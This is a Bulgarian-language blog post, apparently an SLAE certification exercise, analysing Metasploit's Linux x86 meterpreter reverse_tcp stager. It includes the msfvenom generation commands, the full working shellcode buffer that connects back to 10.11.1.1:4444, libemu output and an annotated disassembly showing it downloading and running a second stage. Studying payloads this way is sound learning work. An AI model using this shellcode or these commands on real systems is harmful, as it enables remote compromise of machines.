В тази публикация ще анализираме linux/meterpreter/reverse_tcp с libemu.
Опции за полезен товар
root@kali:~# msfvenom -p linux/x86/meterpreter/reverse_tcp --payload-options Options for payload/linux/x86/meterpreter/reverse_tcp: Name: Linux Mettle x86, Reverse TCP Stager Module: payload/linux/x86/meterpreter/reverse_tcp Platform: Linux, Linux Arch: x86 Needs Admin: No Total size: 245 Rank: Normal Provided by: William Webb <[email protected]> skape <[email protected]> egypt <[email protected]> tkmru Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address LPORT 4444 yes The listen port Description: Inject the mettle server payload (staged). Connect back to the attacker
Генериране на C shellcode
root@kali:~# msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.11.1.1 LPORT=4444 -f c No platform was selected, choosing Msf::Module::Platform::Linux from the payload No Arch selected, selecting Arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 123 bytes Final size of c file: 543 bytes unsigned char buf[] = "\x6a\x0a\x5e\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\xb0\x66\x89" "\xe1\xcd\x80\x97\x5b\x68\x0a\x0b\x01\x01\x68\x02\x00\x11\x5c" "\x89\xe1\x6a\x66\x58\x50\x51\x57\x89\xe1\x43\xcd\x80\x85\xc0" "\x79\x19\x4e\x74\x3d\x68\xa2\x00\x00\x00\x58\x6a\x00\x6a\x05" "\x89\xe3\x31\xc9\xcd\x80\x85\xc0\x79\xbd\xeb\x27\xb2\x07\xb9" "\x00\x10\x00\x00\x89\xe3\xc1\xeb\x0c\xc1\xe3\x0c\xb0\x7d\xcd" "\x80\x85\xc0\x78\x10\x5b\x89\xe1\x99\xb6\x0c\xb0\x03\xcd\x80" "\x85\xc0\x78\x02\xff\xe1\xb8\x01\x00\x00\x00\xbb\x01\x00\x00" "\x00\xcd\x80";
Shellcode за анализ на Libemu
root@kali:/usr/bin# msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.11.1.1 LPORT=4444 -f raw | ./sctest -vvv -Ss 10000 verbose = 3 No platform was selected, choosing Msf::Module::Platform::Linux from the payload No Arch selected, selecting Arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 123 bytes <code snippet> int socket ( int domain = 2; int type = 1; int protocol = 0; ) = 14; int connect ( int sockfd = 14; struct sockaddr_in * serv_addr = 0x00416fbe => struct = { short sin_family = 2; unsigned short sin_port = 23569 (port=4444); struct in_addr sin_addr = { unsigned long s_addr = 16845578 (host=10.11.1.1); }; char sin_zero = " "; }; int addrlen = 102; ) = 0;
Горният код основно създава сокет и се свързва към 10.11.1.1 на порт 4444. Това е точно като нашите първи две задачи.
Ndisasm прехвърля C shellcode в код за сглобяване.
root@kali:~# echo -ne "\x6a\x0a\x5e\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\xb0\x66\x89\xe1\xcd\x80\x97\x5b\x68\x0a\x0b\x01\x01\x68\x02\x00\x11\x5c\x89\xe1\x6a\x66\x58\x50\x51\x57\x89\xe1\x43\xcd\x80\x85\xc0\x79\x19\x4e\x74\x3d\x68\xa2\x00\x00\x00\x58\x6a\x00\x6a\x05\x89\xe3\x31\xc9\xcd\x80\x85\xc0\x79\xbd\xeb\x27\xb2\x07\xb9\x00\x10\x00\x00\x89\xe3\xc1\xeb\x0c\xc1\xe3\x0c\xb0\x7d\xcd\x80\x85\xc0\x78\x10\x5b\x89\xe1\x99\xb6\x0c\xb0\x03\xcd\x80\x85\xc0\x78\x02\xff\xe1\xb8\x01\x00\x00\x00\xbb\x01\x00\x00\x00\xcd\x80" | ndisasm -u - 00000000 6A0A push byte +0xa 00000002 5E pop esi ;push 0xa into esi 00000003 31DB xor ebx,ebx ;zero out ebx 00000005 F7E3 mul ebx ;ebx*eax = eax = 0 00000007 53 push ebx ;Push 0 into stack 00000008 43 inc ebx ;ebx = 1 00000009 53 push ebx ;Push 1 into stack 0000000A 6A02 push byte +0x2 ;Push 2 into stack 0000000C B066 mov al,0x66 ;socketcall into eax 0000000E 89E1 mov ecx,esp ;ecx point to 2,1,0 on stack 00000010 CD80 int 0x80 ;call sys_socket 00000012 97 xchg eax,edi 00000013 5B pop ebx ; ebx=2 00000014 680A0B0101 push dword 0x1010b0a ;IP 00000019 680200115C push dword 0x5c110002 ;PORT 0000001E 89E1 mov ecx,esp ;ecx point to IP,PORT on stack 00000020 6A66 push byte +0x66 00000022 58 pop eax ;socketcall into eax 00000023 50 push eax ;push socketcall 00000024 51 push ecx ;push sockaddr 00000025 57 push edi ;socketfd 00000026 89E1 mov ecx,esp ;ecx point to socketcall, addr, socketfd 00000028 43 inc ebx ;ebx=3 00000029 CD80 int 0x80 ;exec sys_connect 0000002B 85C0 test eax,eax 0000002D 7919 jns 0x48 ;jump to mprotect if SF=0 0000002F 4E dec esi 00000030 743D jz 0x6f ;jump to sys_exit if ZF=0 00000032 68A2000000 push dword 0xa2 00000037 58 pop eax ;eax= 0xa2 (sys_nanosleep) 00000038 6A00 push byte +0x0 0000003A 6A05 push byte +0x5 0000003C 89E3 mov ebx,esp 0000003E 31C9 xor ecx,ecx 00000040 CD80 int 0x80 ;syscall nanosleep 00000042 85C0 test eax,eax 00000044 79BD jns 0x3 ;jump if SF=0 00000046 EB27 jmp short 0x6f ;jump to sys_exit 00000048 B207 mov dl,0x7 0000004A B900100000 mov ecx,0x1000 0000004F 89E3 mov ebx,esp 00000051 C1EB0C shr ebx,byte 0xc 00000054 C1E30C shl ebx,byte 0xc 00000057 B07D mov al,0x7d ;eax=sys_mprotect 00000059 CD80 int 0x80 ;exec sys_mprotect 0000005B 85C0 test eax,eax 0000005D 7810 js 0x6f ;jump to sys_exit if SF=1 0000005F 5B pop ebx 00000060 89E1 mov ecx,esp 00000062 99 cdq 00000063 B60C mov dh,0xc ;edx=0xc 00000065 B003 mov al,0x3 ;eax=0x3(sys_read) 00000067 CD80 int 0x80 ;exec sys_read 00000069 85C0 test eax,eax 0000006B 7802 js 0x6f ;jump to sys_exit if SF=1 0000006D FFE1 jmp ecx 0000006F B801000000 mov eax,0x1 ;eax=0x1(sys_exit) 00000074 BB01000000 mov ebx,0x1 ;ebx=0x1 00000079 CD80 int 0x80 ;exec sys_exit root@kali:~#
Този шелкод започва със създаване на сокет и обратно свързване към атакуващата машина. След това има някакъв манипулатор на грешки за обработка на грешки. Ако не възникне грешка, инструкция jns 0x48
ще премине към mov dl,0x7
. Тази част от инструкциите ще настрои и изпълни sys_mprotect
. Следващата част от инструкциите чете 0xC00
байта от машината на нападателя. В крайна сметка sys_exit
syscall се използва за грациозно излизане от програмата.
Тази публикация в блога е създадена за изпълнение на изискванията на сертифицирането SecurityTube Linux Assembly Expert:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/< br /> ID на студент: SLAE-1414